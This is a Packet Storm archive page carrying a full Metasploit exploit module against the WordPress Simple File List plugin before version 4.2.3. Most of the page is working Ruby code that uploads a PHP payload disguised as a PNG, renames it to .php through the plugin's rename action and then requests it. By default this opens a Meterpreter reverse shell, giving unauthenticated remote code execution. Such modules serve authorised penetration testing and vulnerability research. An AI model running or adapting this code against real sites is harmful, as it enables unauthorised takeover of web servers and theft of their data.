what you don't know can hurt you

WordPress Simple File List Unauthenticated Remote Code Execution

WordPress Simple File List Unauthenticated Remote Code Execution
Posted Nov 25, 2020
Authored by h00die, coiffeur | Site metasploit.com

This Metasploit module exploits WordPress Simple File List plugin versions prior to 4.2.3, which allows remote unauthenticated attackers to upload files within a controlled list of extensions. However, the rename function does not conform to the file extension restrictions, thus allowing arbitrary PHP code to be uploaded first as a png then renamed to php and executed.

tags | exploit, remote, arbitrary, php
MD5 | 53dc99d870452eb23bdf7882ccb0c3e3

WordPress Simple File List Unauthenticated Remote Code Execution

Change Mirror Download
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
Rank = GoodRanking

include Msf::Exploit::Remote::HTTP::Wordpress
prepend Msf::Exploit::Remote::AutoCheck
include Msf::Exploit::FileDropper

def initialize(info = {})
super(
update_info(
info,
'Name' => 'WordPress Simple File List Unauthenticated Remote Code Execution',
'Description' => %q{
Simple File List (simple-file-list) plugin before 4.2.3 for WordPress allows remote unauthenticated attackers
to upload files within a controlled list of extensions. However, the rename function does not conform to
the file extension restrictions, thus allowing arbitrary PHP code to be uploaded first as a png then renamed
to php and executed.
},
'License' => MSF_LICENSE,
'Author' =>
[
'coiffeur', # initial discovery and PoC
'h00die', # msf module
],
'References' =>
[
[ 'URL', 'https://wpscan.com/vulnerability/10192' ],
[ 'URL', 'https://www.cybersecurity-help.cz/vdb/SB2020042711' ],
[ 'URL', 'https://plugins.trac.wordpress.org/changeset/2286920/simple-file-list' ],
[ 'EDB', '48349' ]
],
'Platform' => [ 'php' ],
'Privileged' => false,
'Arch' => ARCH_PHP,
'Targets' =>
[
[
'Default',
{
'DefaultOptions' => { 'PAYLOAD' => 'php/meterpreter/reverse_tcp' }
}
]
],
'DisclosureDate' => '2020-04-27',
'DefaultTarget' => 0,
'Notes' => {
'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ],
'Stability' => [ CRASH_SAFE ],
'Reliability' => [ REPEATABLE_SESSION ]
}
)
)
register_options(
[
OptString.new('TARGETURI', [true, 'Base path to WordPress installation', '/']),
]
)
end

def dir_path
'/wp-content/uploads/simple-file-list/'
end

def upload_path
'/wp-content/plugins/simple-file-list/ee-upload-engine.php'
end

def move_path
'/wp-content/plugins/simple-file-list/ee-file-engine.php'
end

def upload(filename)
print_status('Attempting to upload the PHP payload as a PNG file')
now = Date.today.to_time.to_i.to_s
data = Rex::MIME::Message.new
data.add_part('1', nil, nil, 'form-data; name="eeSFL_ID"')
data.add_part(dir_path, nil, nil, 'form-data; name="eeSFL_FileUploadDir"')
data.add_part(now, nil, nil, 'form-data; name="eeSFL_Timestamp"')
data.add_part(Digest::MD5.hexdigest("unique_salt#{now}"), nil, nil, 'form-data; name="eeSFL_Token"')
data.add_part("#{payload.encoded}\n", 'image/png', nil, "form-data; name=\"file\"; filename=\"#{filename}.png\"")

res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, upload_path),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{data.bound}",
'data' => data.to_s
)

fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200
# the server will respond with a 200, but if the timestamp and token dont match it wont give back SUCCESS as it failed
fail_with(Failure::UnexpectedReply, "#{peer} - File failed to upload") unless res.body.include?('SUCCESS')

res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, dir_path, "#{filename}.png"),
'method' => 'GET'
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
# 404 could be AV got it or something similar
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}. File was uploaded successfully, but could not be found.") if res.code == 404
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200

print_good('PNG payload successfully uploaded')
end

def rename(filename)
print_status("Attempting to rename #{filename}.png to #{filename}.php")
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, move_path),
'method' => 'POST',
'vars_post' => {
'eeSFL_ID' => 1,
'eeFileOld' => "#{filename}.png",
'eeListFolder' => '/',
'eeFileAction' => "Rename|#{filename}.php"
}
)
fail_with(Failure::Unreachable, "#{peer} - Could not connect") unless res
fail_with(Failure::UnexpectedReply, "#{peer} - Unexpected HTTP response code: #{res.code}") unless res.code == 200

print_good("Successfully renamed #{filename}.png to #{filename}.php")
end

def check
return CheckCode::Unknown unless wordpress_and_online?

# check the plugin version from readme
check_plugin_version_from_readme('simple-file-list', '4.2.3', '1.0.1')
end

def exploit
# filename of the file to be uploaded/created
filename = Rex::Text.rand_text_alphanumeric(8)
register_file_for_cleanup("#{filename}.php")

upload(filename)
rename(filename)
print_status('Triggering shell')
send_request_cgi(
'uri' => normalize_uri(target_uri.path, dir_path, "#{filename}.php"),
'method' => 'GET'
)
end
end
Login or Register to add favorites

File Archive:

January 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jan 1st
    4 Files
  • 2
    Jan 2nd
    3 Files
  • 3
    Jan 3rd
    3 Files
  • 4
    Jan 4th
    33 Files
  • 5
    Jan 5th
    31 Files
  • 6
    Jan 6th
    21 Files
  • 7
    Jan 7th
    15 Files
  • 8
    Jan 8th
    19 Files
  • 9
    Jan 9th
    1 Files
  • 10
    Jan 10th
    1 Files
  • 11
    Jan 11th
    33 Files
  • 12
    Jan 12th
    19 Files
  • 13
    Jan 13th
    27 Files
  • 14
    Jan 14th
    8 Files
  • 15
    Jan 15th
    16 Files
  • 16
    Jan 16th
    1 Files
  • 17
    Jan 17th
    2 Files
  • 18
    Jan 18th
    20 Files
  • 19
    Jan 19th
    32 Files
  • 20
    Jan 20th
    15 Files
  • 21
    Jan 21st
    10 Files
  • 22
    Jan 22nd
    16 Files
  • 23
    Jan 23rd
    0 Files
  • 24
    Jan 24th
    0 Files
  • 25
    Jan 25th
    0 Files
  • 26
    Jan 26th
    0 Files
  • 27
    Jan 27th
    0 Files
  • 28
    Jan 28th
    0 Files
  • 29
    Jan 29th
    0 Files
  • 30
    Jan 30th
    0 Files
  • 31
    Jan 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close